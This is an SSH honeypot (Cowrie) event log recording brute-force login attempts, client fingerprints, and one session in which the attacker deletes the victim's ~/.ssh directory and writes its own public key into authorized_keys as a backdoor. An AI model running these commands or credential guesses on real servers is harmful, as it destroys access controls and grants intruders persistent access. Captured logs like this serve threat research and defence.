{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":38458,"dst_ip":"1.2.3.4","dst_port":22,"session":"efdfacec346d","protocol":"ssh","message":"New connection: 27.112.79.123:38458 (1.2.3.4:22) [session: efdfacec346d]","sensor":"my-vps","timestamp":"2025-08-28T11:19:37.377756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:19:37.380185Z","src_ip":"27.112.79.123","session":"efdfacec346d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:37.513414Z","src_ip":"212.227.125.160","session":"b3b0a9fc5693"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:19:37.640033Z","src_ip":"27.112.79.123","session":"efdfacec346d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:19:38.706434Z","src_ip":"27.112.79.123","session":"efdfacec346d"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:38.968430Z","src_ip":"27.112.79.123","session":"a9b8819ec36b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:19:38.969295Z","src_ip":"27.112.79.123","session":"efdfacec346d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34942,"dst_ip":"1.2.3.4","dst_port":22,"session":"d205ff64aabf","protocol":"ssh","message":"New connection: 212.227.125.160:34942 (1.2.3.4:22) [session: d205ff64aabf]","sensor":"my-vps","timestamp":"2025-08-28T11:20:17.194041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:20:17.293866Z","src_ip":"212.227.125.160","session":"d205ff64aabf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:20:17.357900Z","src_ip":"212.227.125.160","session":"d205ff64aabf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"qwerty","message":"login attempt [admin/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:20:18.114850Z","src_ip":"212.227.125.160","session":"d205ff64aabf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:20:19.338909Z","src_ip":"212.227.125.160","session":"d205ff64aabf"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":45846,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd3a7374d74f","protocol":"ssh","message":"New connection: 27.112.79.123:45846 (1.2.3.4:22) [session: bd3a7374d74f]","sensor":"my-vps","timestamp":"2025-08-28T11:20:47.132915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:20:47.134370Z","src_ip":"27.112.79.123","session":"bd3a7374d74f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:20:47.396509Z","src_ip":"27.112.79.123","session":"bd3a7374d74f"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Aa123456789!","message":"login attempt [ubuntu/Aa123456789!] failed","sensor":"my-vps","timestamp":"2025-08-28T11:20:48.445798Z","src_ip":"27.112.79.123","session":"bd3a7374d74f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:20:49.712706Z","src_ip":"27.112.79.123","session":"bd3a7374d74f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34818,"dst_ip":"1.2.3.4","dst_port":22,"session":"e66fc1e9fb65","protocol":"ssh","message":"New connection: 212.227.125.160:34818 (1.2.3.4:22) [session: e66fc1e9fb65]","sensor":"my-vps","timestamp":"2025-08-28T11:20:57.493534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:20:57.494570Z","src_ip":"212.227.125.160","session":"e66fc1e9fb65"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:20:57.654863Z","src_ip":"212.227.125.160","session":"e66fc1e9fb65"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123123","message":"login attempt [admin/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:20:58.443535Z","src_ip":"212.227.125.160","session":"e66fc1e9fb65"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:20:59.609434Z","src_ip":"212.227.125.160","session":"e66fc1e9fb65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38498,"dst_ip":"1.2.3.4","dst_port":22,"session":"0477a6f2a86a","protocol":"ssh","message":"New connection: 212.227.235.229:38498 (1.2.3.4:22) [session: 0477a6f2a86a]","sensor":"my-vps","timestamp":"2025-08-28T11:21:09.758711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T11:21:09.760297Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T11:21:09.867673Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"999111","message":"login attempt [admin/999111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:21:10.381325Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"987654321q","message":"login attempt [admin/987654321q] failed","sensor":"my-vps","timestamp":"2025-08-28T11:21:11.491060Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"979797","message":"login attempt [admin/979797] failed","sensor":"my-vps","timestamp":"2025-08-28T11:21:12.930194Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"929292","message":"login attempt [admin/929292] failed","sensor":"my-vps","timestamp":"2025-08-28T11:21:14.039817Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"885522","message":"login attempt [admin/885522] failed","sensor":"my-vps","timestamp":"2025-08-28T11:21:15.150240Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:21:16.260520Z","src_ip":"212.227.235.229","session":"0477a6f2a86a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44604,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef0c6264e94d","protocol":"ssh","message":"New connection: 212.227.125.160:44604 (1.2.3.4:22) [session: ef0c6264e94d]","sensor":"my-vps","timestamp":"2025-08-28T11:21:40.037286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:21:40.038079Z","src_ip":"212.227.125.160","session":"ef0c6264e94d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:21:40.219308Z","src_ip":"212.227.125.160","session":"ef0c6264e94d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:21:40.921945Z","src_ip":"212.227.125.160","session":"ef0c6264e94d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:21:42.153376Z","src_ip":"212.227.125.160","session":"ef0c6264e94d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":50404,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdcbd34fbf5c","protocol":"ssh","message":"New connection: 27.112.79.123:50404 (1.2.3.4:22) [session: bdcbd34fbf5c]","sensor":"my-vps","timestamp":"2025-08-28T11:21:59.299664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:21:59.300617Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:21:59.561183Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.login.success","username":"root","password":"videoflow","message":"login attempt [root/videoflow] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:22:00.656781Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:22:01.196014Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:22:01.196884Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:22:01.198114Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:01.462876Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:22:02.039734Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:22:02.040579Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:22:02.303558Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:02.304634Z","src_ip":"27.112.79.123","session":"bdcbd34fbf5c"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":50418,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb231aa11bfd","protocol":"ssh","message":"New connection: 27.112.79.123:50418 (1.2.3.4:22) [session: fb231aa11bfd]","sensor":"my-vps","timestamp":"2025-08-28T11:22:02.572340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:22:02.573862Z","src_ip":"27.112.79.123","session":"fb231aa11bfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:22:02.834355Z","src_ip":"27.112.79.123","session":"fb231aa11bfd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:22:03.879389Z","src_ip":"27.112.79.123","session":"fb231aa11bfd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:22:05.146188Z","src_ip":"27.112.79.123","session":"fb231aa11bfd"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":50614,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e87d76d1f99","protocol":"ssh","message":"New connection: 27.112.79.123:50614 (1.2.3.4:22) [session: 3e87d76d1f99]","sensor":"my-vps","timestamp":"2025-08-28T11:22:05.413664Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:22:05.414589Z","src_ip":"27.112.79.123","session":"3e87d76d1f99"}
